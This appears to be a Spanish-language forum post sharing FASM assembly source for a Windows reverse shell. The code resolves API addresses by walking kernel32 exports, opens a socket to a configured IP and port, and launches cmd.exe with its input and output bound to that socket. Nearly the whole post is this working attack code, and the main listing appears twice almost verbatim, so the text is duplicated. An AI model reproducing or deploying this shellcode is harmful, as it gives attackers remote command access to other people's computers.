Autor
Código:
include 'C:\fasm\INCLUDE\win32ax.inc'
IP EQU 127 + 1*256*256*256
PORT EQU 8000h
Size_of_WSADATA EQU 400
Size_of_SOCKET EQU 4
Size_of_PROCESS_INFORMATION EQU 16
Size_of_STARTUPINFO EQU 68
Size_of_sockaddr_in EQU 16
AF_INET EQU 2
SOCK_STREAM EQU 1
.code
start:
push ebp
mov ebp, esp
sub esp, 1024
db 64h, 0A1h, 30h, 0h, 0h, 0h ;mov eax, fs:[30h]
mov eax, [eax + 0Ch]
mov esi, [eax + 1Ch]
lodsd
mov ebx, [eax + 08h]
mov [ebp - 4], ebx ;We have in [ebp - 4] the address off kernel32.dll
mov ecx, [ebx + 3Ch]
add ecx, ebx ;We have in ecx the address off PE
mov ecx, [ecx + 78h]
add ecx, ebx ;We have in ecx the address off .edata section
mov esi, [ecx + 20h]
add esi, ebx ;We have in esi the address off AddressOfNames table
xor edx, edx
cld
Find_GetProcAddress:
inc edx
lodsd
add eax, ebx
cmp dword [eax], "GetP"
jne Find_GetProcAddress
cmp dword [eax + 4], "rocA"
jne Find_GetProcAddress
cmp dword [eax + 8], "ddre"
jne Find_GetProcAddress
mov esi, [ecx + 24h]
add esi, ebx
add esi, edx
add esi, edx
lodsd
xor esi, esi
mov si, ax
dec esi
mov edx, [ecx + 1Ch]
add edx, ebx
shl esi, 2
add esi, edx
lodsd
add eax, ebx
mov [ebp - 32], eax ;We have in [ebp - 32] the address of GetProcAddress
mov dword [ebp - 20], "Load"
mov dword [ebp - 16], "Libr"
mov dword [ebp - 12], "aryA"
mov dword [ebp - 8], 0
lea ecx, [ebp - 20]
push ecx
push ebx
call eax ;We have in eax the address off LoadLibraryA
mov dword [ebp - 16], "ws2_"
mov dword [ebp - 12], "32.d"
mov dword [ebp - 8], "ll"
lea ecx, [ebp - 16]
push ecx
call eax
mov [ebp - 8], eax ;We have in [ebp - 8] the address off ws2_32.dll
mov dword [ebp - 20], "WSAS"
mov dword [ebp - 16], "tart"
mov dword [ebp - 12], "up"
lea ecx, [ebp - 20]
mov ebx, [ebp - 32]
push ecx
push eax
call ebx
mov [ebp - 12], eax ;We have in [ebp - 12] the address off WSAStartup
mov dword [ebp - 28], "Crea"
mov dword [ebp - 24], "tePr"
mov dword [ebp - 20], "oces"
mov dword [ebp - 16], "sA"
lea ecx, [ebp - 28]
mov ebx, [ebp - 4]
mov eax, [ebp - 32]
push ecx
push ebx
call eax
mov [ebp - 4], eax ;We have in [ebp - 4] the address off CreateProcessA
mov dword [ebp - 24], "WSAS"
mov dword [ebp - 20], "ocke"
mov dword [ebp - 16], "tA"
lea ecx, [ebp - 24]
mov ebx, [ebp - 8]
mov eax, [ebp - 32]
push ecx
push ebx
call eax
mov [ebp - 16], eax ;We have in [ebp - 16] the address off WSASocketA
mov dword [ebp - 24], "conn"
mov dword [ebp - 20], "ect"
lea ecx, [ebp - 24]
mov ebx, [ebp - 8]
mov eax, [ebp - 32]
push ecx
push ebx
call eax
mov [ebp - 8], eax ;We have in [ebp - 8] the address off connect
;Now we habe in the stack the four Apis that our reverse shell will use.
;[ebp - 4] ------------------------> CreateProcessA
;[ebp - 8] ------------------------> connect
;[ebp - 12] ------------------------> WSAStartup
;[ebp - 16] ------------------------> WSASocketA
;Now I am goint to traslate to ASM this C code:
;WSADATA wsaData;
;SOCKET hSocket;
;STARTUPINFO si;
;PROCESS_INFORMATION pi;
;struct sockaddr_in adik_sin;
;memset(&adik_sin, 0, sizeof(adik_sin));
;memset(&si, 0, sizeof(si));
;WSAStartup(MAKEWORD(2,0), &wsaData);
;hSocket = WSASocket(AF_INET, SOCK_STREAM, 0, 0, 0, 0);
;adik_sin.sin_family = AF_INET;
;adik_sin.sin_port = htons(Port);
;adik_sin.sin_addr.s_addr = inet_addr(IP);
;connect(hSocket, (struct sockaddr*)&adik_sin, sizeof(adik_sin));
;si.cb = sizeof(si);
;si.dwFlags = STARTF_USESTDHANDLES + STARTF_USESHOWWINDOW;
;si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
;CreateProcess(0, "cmd.exe", 0, 0, 1, 0, 0, 0, &si, &pi);
cld
mov ecx, (Size_of_sockaddr_in + Size_of_STARTUPINFO)/4
lea ebx, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO]
Put_zero:
mov dword [ebx], 0
add ebx, 4
loop Put_zero
lea ecx, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET - Size_of_WSADATA]
mov ebx, [ebp - 12]
push ecx
push 2
call ebx
mov ebx, [ebp - 16]
push 0
push 0
push 0
push 0
push SOCK_STREAM
push AF_INET
call ebx
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET], eax
mov word [ebp - 16 - Size_of_sockaddr_in], AF_INET
mov word [ebp - 16 - Size_of_sockaddr_in + 2], PORT
mov dword [ebp - 16 - Size_of_sockaddr_in + 4], IP
mov eax, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET]
lea ecx, [ebp - 16 - Size_of_sockaddr_in]
mov ebx, [ebp - 8]
push Size_of_sockaddr_in
push ecx
push eax
call ebx
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO], Size_of_STARTUPINFO
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO + 44], 257; STARTF_USESTDHANDLES + STARTF_USESHOWWINDOW = 257
mov eax, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET]
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO + 56], eax
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO + 60], eax
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO + 64], eax
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET - Size_of_WSADATA - 8], "cmd."
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET - Size_of_WSADATA - 4], "exe"
lea edx, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET - Size_of_WSADATA - 8]
lea ecx, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO]
lea eax, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION]
mov ebx, [ebp - 4]
push eax
push ecx
push 0
push 0
push 0
push 1
push 0
push 0
push edx
push 0
call ebx
IP EQU 127 + 1*256*256*256
PORT EQU 8000h
Size_of_WSADATA EQU 400
Size_of_SOCKET EQU 4
Size_of_PROCESS_INFORMATION EQU 16
Size_of_STARTUPINFO EQU 68
Size_of_sockaddr_in EQU 16
AF_INET EQU 2
SOCK_STREAM EQU 1
.code
start:
push ebp
mov ebp, esp
sub esp, 1024
db 64h, 0A1h, 30h, 0h, 0h, 0h ;mov eax, fs:[30h]
mov eax, [eax + 0Ch]
mov esi, [eax + 1Ch]
lodsd
mov ebx, [eax + 08h]
mov [ebp - 4], ebx ;We have in [ebp - 4] the address off kernel32.dll
mov ecx, [ebx + 3Ch]
add ecx, ebx ;We have in ecx the address off PE
mov ecx, [ecx + 78h]
add ecx, ebx ;We have in ecx the address off .edata section
mov esi, [ecx + 20h]
add esi, ebx ;We have in esi the address off AddressOfNames table
xor edx, edx
cld
Find_GetProcAddress:
inc edx
lodsd
add eax, ebx
cmp dword [eax], "GetP"
jne Find_GetProcAddress
cmp dword [eax + 4], "rocA"
jne Find_GetProcAddress
cmp dword [eax + 8], "ddre"
jne Find_GetProcAddress
mov esi, [ecx + 24h]
add esi, ebx
add esi, edx
add esi, edx
lodsd
xor esi, esi
mov si, ax
dec esi
mov edx, [ecx + 1Ch]
add edx, ebx
shl esi, 2
add esi, edx
lodsd
add eax, ebx
mov [ebp - 32], eax ;We have in [ebp - 32] the address of GetProcAddress
mov dword [ebp - 20], "Load"
mov dword [ebp - 16], "Libr"
mov dword [ebp - 12], "aryA"
mov dword [ebp - 8], 0
lea ecx, [ebp - 20]
push ecx
push ebx
call eax ;We have in eax the address off LoadLibraryA
mov dword [ebp - 16], "ws2_"
mov dword [ebp - 12], "32.d"
mov dword [ebp - 8], "ll"
lea ecx, [ebp - 16]
push ecx
call eax
mov [ebp - 8], eax ;We have in [ebp - 8] the address off ws2_32.dll
mov dword [ebp - 20], "WSAS"
mov dword [ebp - 16], "tart"
mov dword [ebp - 12], "up"
lea ecx, [ebp - 20]
mov ebx, [ebp - 32]
push ecx
push eax
call ebx
mov [ebp - 12], eax ;We have in [ebp - 12] the address off WSAStartup
mov dword [ebp - 28], "Crea"
mov dword [ebp - 24], "tePr"
mov dword [ebp - 20], "oces"
mov dword [ebp - 16], "sA"
lea ecx, [ebp - 28]
mov ebx, [ebp - 4]
mov eax, [ebp - 32]
push ecx
push ebx
call eax
mov [ebp - 4], eax ;We have in [ebp - 4] the address off CreateProcessA
mov dword [ebp - 24], "WSAS"
mov dword [ebp - 20], "ocke"
mov dword [ebp - 16], "tA"
lea ecx, [ebp - 24]
mov ebx, [ebp - 8]
mov eax, [ebp - 32]
push ecx
push ebx
call eax
mov [ebp - 16], eax ;We have in [ebp - 16] the address off WSASocketA
mov dword [ebp - 24], "conn"
mov dword [ebp - 20], "ect"
lea ecx, [ebp - 24]
mov ebx, [ebp - 8]
mov eax, [ebp - 32]
push ecx
push ebx
call eax
mov [ebp - 8], eax ;We have in [ebp - 8] the address off connect
;Now we habe in the stack the four Apis that our reverse shell will use.
;[ebp - 4] ------------------------> CreateProcessA
;[ebp - 8] ------------------------> connect
;[ebp - 12] ------------------------> WSAStartup
;[ebp - 16] ------------------------> WSASocketA
;Now I am goint to traslate to ASM this C code:
;WSADATA wsaData;
;SOCKET hSocket;
;STARTUPINFO si;
;PROCESS_INFORMATION pi;
;struct sockaddr_in adik_sin;
;memset(&adik_sin, 0, sizeof(adik_sin));
;memset(&si, 0, sizeof(si));
;WSAStartup(MAKEWORD(2,0), &wsaData);
;hSocket = WSASocket(AF_INET, SOCK_STREAM, 0, 0, 0, 0);
;adik_sin.sin_family = AF_INET;
;adik_sin.sin_port = htons(Port);
;adik_sin.sin_addr.s_addr = inet_addr(IP);
;connect(hSocket, (struct sockaddr*)&adik_sin, sizeof(adik_sin));
;si.cb = sizeof(si);
;si.dwFlags = STARTF_USESTDHANDLES + STARTF_USESHOWWINDOW;
;si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
;CreateProcess(0, "cmd.exe", 0, 0, 1, 0, 0, 0, &si, &pi);
cld
mov ecx, (Size_of_sockaddr_in + Size_of_STARTUPINFO)/4
lea ebx, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO]
Put_zero:
mov dword [ebx], 0
add ebx, 4
loop Put_zero
lea ecx, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET - Size_of_WSADATA]
mov ebx, [ebp - 12]
push ecx
push 2
call ebx
mov ebx, [ebp - 16]
push 0
push 0
push 0
push 0
push SOCK_STREAM
push AF_INET
call ebx
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET], eax
mov word [ebp - 16 - Size_of_sockaddr_in], AF_INET
mov word [ebp - 16 - Size_of_sockaddr_in + 2], PORT
mov dword [ebp - 16 - Size_of_sockaddr_in + 4], IP
mov eax, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET]
lea ecx, [ebp - 16 - Size_of_sockaddr_in]
mov ebx, [ebp - 8]
push Size_of_sockaddr_in
push ecx
push eax
call ebx
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO], Size_of_STARTUPINFO
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO + 44], 257; STARTF_USESTDHANDLES + STARTF_USESHOWWINDOW = 257
mov eax, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET]
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO + 56], eax
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO + 60], eax
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO + 64], eax
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET - Size_of_WSADATA - 8], "cmd."
mov dword [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET - Size_of_WSADATA - 4], "exe"
lea edx, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION - Size_of_SOCKET - Size_of_WSADATA - 8]
lea ecx, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO]
lea eax, [ebp - 16 - Size_of_sockaddr_in - Size_of_STARTUPINFO - Size_of_PROCESS_INFORMATION]
mov ebx, [ebp - 4]
push eax
push ecx
push 0
push 0
push 0
push 1
push 0
push 0
push edx
push 0
call ebx
Y tras este aporte me voy a emborracharme y a que me de el aire.
En línea
. En windows hay q andar buscando todas las syscalls 
